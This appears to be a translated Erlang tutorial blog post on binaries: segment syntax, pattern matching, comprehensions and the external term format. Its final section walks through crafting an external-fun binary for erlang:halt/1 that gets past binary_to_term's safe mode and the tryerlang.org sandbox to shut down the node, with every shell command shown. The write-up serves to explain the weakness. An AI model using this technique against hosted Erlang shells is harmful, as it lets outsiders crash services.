[Erlang20] Conquering Binary Together
Cowboy aims to provide a complete HTTP stack in a small code base. It is optimized for low latency and low memory usage, in part because it uses binary strings.
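- How the Erlang VM implements the Binary data type. It covers the implementation from the big picture down to the details and is worth rereading carefully: http://www.cnblogs.com/zhengsyao/p/erlang_eterm_implementation_5_binary.html
- An explanation, from the application-level usage side, of why Binary is very efficient and uses less memory than List: http://cryolite.iteye.com/blog/1547252
- The official Efficiency Guide mentioned in item 1: http://www.erlang.org/doc/efficiency_guide/binaryhandling.html
- When processing a Binary, it is best to write your own pattern matching or use the functions in binary.erl: http://stackoverflow.com/questions/21779394/erlang-high-memory-usage-for-processing-list-of-binary-parts
- An article that explains how Binary works by telling a story: http://dieswaytoofast.blogspot.com/2012/12/erlang-binaries-and-garbage-collection.html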
keep_0XX([{0,B2,B3}|Rest]) ->
    [{0,B2,B3}|keep_0XX(Rest)];
keep_0XX([{1,_,_}|Rest]) ->
    keep_0XX(Rest);
keep_0XX([]) ->
    [].
keep_0XX(List) ->
[{0,B2,B3} || {0,B2,B3} <- List].
keep_0XX(Bin) ->
[ <<0:1,B:2>> || <<0:1,B:2>> <= Bin].
<<Segment1,Segment2,...,SegmentN>>
Value:Size/TypeSpecifierList
Segment | Default expansion |
X | X:8/integer-unit:1 |
X/float | X:64/float-unit:1 |
X/binary | X:all/binary |
X:Size/binary | X:Size/binary-unit:8 |
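The default expansions in the table can be checked by comparing the short form of a segment with its fully written-out form. The following is only a minimal sketch: the module name `segment_defaults` and its function names are made up for this illustration and are not part of any library.

```erlang
-module(segment_defaults).
-export([integer_default/1, float_default/1, binary_default/1, sized_binary/2]).

%% X is shorthand for X:8/integer-unit:1
integer_default(X) when is_integer(X) ->
    <<X>> =:= <<X:8/integer-unit:1>>.

%% X/float is shorthand for X:64/float-unit:1
float_default(X) when is_float(X) ->
    <<X/float>> =:= <<X:64/float-unit:1>>.

%% X/binary without a size takes the whole binary
binary_default(X) when is_binary(X) ->
    <<X/binary>> =:= X.

%% X:Size/binary counts Size in units of 8 bits,
%% so the matched head is Size bytes long
sized_binary(Bin, Size) when is_binary(Bin) ->
    <<Head:Size/binary, _Rest/binary>> = Bin,
    {Head, bit_size(Head)}.
```

For example, `segment_defaults:sized_binary(<<1,2,3>>, 2)` matches two bytes and reports their size as 16 bits.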
Binary = <<10, 11, 12>>,
<<A:8, B/binary>> = Binary.
%% A = 10, B = <<11,12>>
<<Sz:8/integer, Vsn:Sz/integer, Msg/binary>> = <<16,2,154,42>>.
%% Sz = 16, Vsn = 666, Msg = <<42>>
case Binary of
    <<42:8/integer, X/binary>> ->
        handle_bin(X);
    <<Sz:8, V:Sz/integer, X/binary>> when Sz > 16 ->
        handle_int_bin(V, X);
    <<_:8, X:16/integer, Y:8/integer>> ->
        handle_int_int(X, Y)
end.
Binary | Matching of X |
<<42,14,15>> | <<14,15>> |
<<24,1,2,3,10,20>> | <<10,20>> |
<<12,1,2,20>> | 258 |
<<0,255>> | failure |
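To reproduce the table, the three clauses can be wrapped in a small module. This is a sketch under stated assumptions: the module name `bin_dispatch` is hypothetical, the handler functions are replaced by tagged tuples so that the chosen clause is visible in the result, and a catch-all clause is added so that a failed match returns `failure` instead of raising a `case_clause` error.

```erlang
-module(bin_dispatch).
-export([dispatch/1]).

%% Same three patterns as the case expression in the text.
%% Tagged tuples stand in for handle_bin/1, handle_int_bin/2
%% and handle_int_int/2 (an assumption of this sketch).
dispatch(Binary) ->
    case Binary of
        <<42:8/integer, X/binary>> ->
            {bin, X};
        <<Sz:8, V:Sz/integer, X/binary>> when Sz > 16 ->
            {int_bin, V, X};
        <<_:8, X:16/integer, Y:8/integer>> ->
            {int_int, X, Y};
        _ ->
            %% Added for the sketch: no clause matched
            failure
    end.
```

Calling `bin_dispatch:dispatch(<<12,1,2,20>>)` falls through to the third clause because the guard `Sz > 16` fails, which is why X is the integer 258 in that row.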
1> [ X || <<X>> <= <<1,2,3,4,5>>, X rem 2 == 0].
[2,4]
5.2 If you only want to turn non-binary data into a binary, you do not need <=
2> << <<R:8, G:8, B:8>> || {R,G,B} <- [{213,45,132},{64,76,32},{76,0,0},{234,32,15}] >>.
<<213,45,132,64,76,32,76,0,0,234,32,15>>
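The choice of generator depends only on what is being iterated over: `<-` for a list, `<=` for a binary. A minimal sketch of both directions follows; the module name `rgb_codec` and the function names `pack/1` and `unpack/1` are invented for this example.

```erlang
-module(rgb_codec).
-export([pack/1, unpack/1]).

%% List of tuples -> binary: the source is a list, so the generator is <-
pack(Pixels) ->
    << <<R:8, G:8, B:8>> || {R, G, B} <- Pixels >>.

%% Binary -> list of tuples: the source is a binary, so the generator is <=
unpack(Bin) ->
    [{R, G, B} || <<R:8, G:8, B:8>> <= Bin].
```

`unpack/1` is the inverse of `pack/1` as long as every component fits in one byte.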
113 | Module | Function | Arity
113 is the tag for the fun type; Module and Function are both atoms, and Arity is an integer. The atoms are encoded with ATOM_EXT and the Arity with SMALL_INTEGER_EXT.
The encoding format for atoms looks like this:
100 | Len | AtomName
Len is the length of AtomName and takes 2 bytes.
The encoding format for the integer looks like this:
97 | Int
Eshell V5.8.1 (abort with ^G)
> term_to_binary(erlang).
<<131,100,0,6,101,114,108,97,110,103>>
> term_to_binary(halt).
<<131,100,0,4,104,97,108,116>>
<<100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116>>
Then prepend 131 (which every term_to_binary/1 result starts with) and 113 (the type tag for external funs), and do not forget to append the arity, 0, at the end:
<<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,0>>
With that, we have represented the external fun erlang:halt/0 in binary form!
> binary_to_term(<<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,0>>).
#Fun<erlang.halt.0>
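The hand-assembled bytes can also be produced by a few lines of code that follow the layouts described in the text. This is only a sketch: the module name `ext_fun_sketch` and both function names are hypothetical, atom names are assumed to be Latin-1, and it relies on binary_to_term/1 still accepting the older ATOM_EXT tag (100) when decoding, even though recent releases emit a different atom tag when encoding.

```erlang
-module(ext_fun_sketch).
-export([encode_atom/1, encode_export/3]).

%% ATOM_EXT: tag 100, a 2-byte big-endian length, then the atom name
encode_atom(Atom) when is_atom(Atom) ->
    Name = atom_to_binary(Atom, latin1),
    <<100, (byte_size(Name)):16, Name/binary>>.

%% External fun: version byte 131, tag 113, module atom, function atom,
%% then the arity as SMALL_INTEGER_EXT (tag 97 followed by one byte)
encode_export(Module, Function, Arity)
  when is_integer(Arity), Arity >= 0, Arity =< 255 ->
    <<131, 113,
      (encode_atom(Module))/binary,
      (encode_atom(Function))/binary,
      97, Arity>>.
```

`ext_fun_sketch:encode_export(erlang, halt, 0)` yields the same 20 bytes that were put together by hand.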
Now let's take our result into the tryerlang.org shell:
> B = <<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,0>>.
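Next we convert B from a binary back into an Erlang term. Originally, tryerlang.org allowed the binary_to_term function in safe mode. Since that attack the function has been blacklisted as well, so you can only try this in your own shell :)
> F = binary_to_term(B, [safe]).
Now let's call this fun and see what happens:
> F().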
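Well, that still does not work: tryerlang.org notices that erlang:halt/0 is about to be called and blocks it. We need one more small change: use erlang:halt/1, the variant that takes exactly one argument. We only need to change the last 0 to 1; remember to first unbind the variable B with the shell command f/1.
> f(B).
> B = <<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,1>>.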
And now it should work:
> f(F).
> F = binary_to_term(B, [safe]).
> lists:map(F, [0]).
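Since calling the decoded fun would stop the node, it is safer to look at what a binary decodes to without running it. A minimal sketch using erlang:fun_info/2 follows; the module name `fun_inspect` and the function `describe/1` are made up for this example, and it assumes the binary encodes an external fun.

```erlang
-module(fun_inspect).
-export([describe/1]).

%% Decode an external-fun binary and report which function it refers to.
%% The fun is only inspected, never called.
describe(Bin) when is_binary(Bin) ->
    F = binary_to_term(Bin, [safe]),
    {module, M} = erlang:fun_info(F, module),
    {name, N} = erlang:fun_info(F, name),
    {arity, A} = erlang:fun_info(F, arity),
    {M, N, A}.
```

With the two binaries from the text, the only difference in the result is the arity: changing the last byte from 0 to 1 turns a reference to erlang:halt/0 into a reference to erlang:halt/1.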
Please note that the hacker had the advantage to look at the source code for tryerlang.org while performing the attack.
I wanted to share this experience with all of you. I consider it highly constructive, since it prompts reflection on several aspects of Erlang.
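To all the high-school students whose term is about to start: may you bump into your homeroom teacher while out shopping~~~ haha~~~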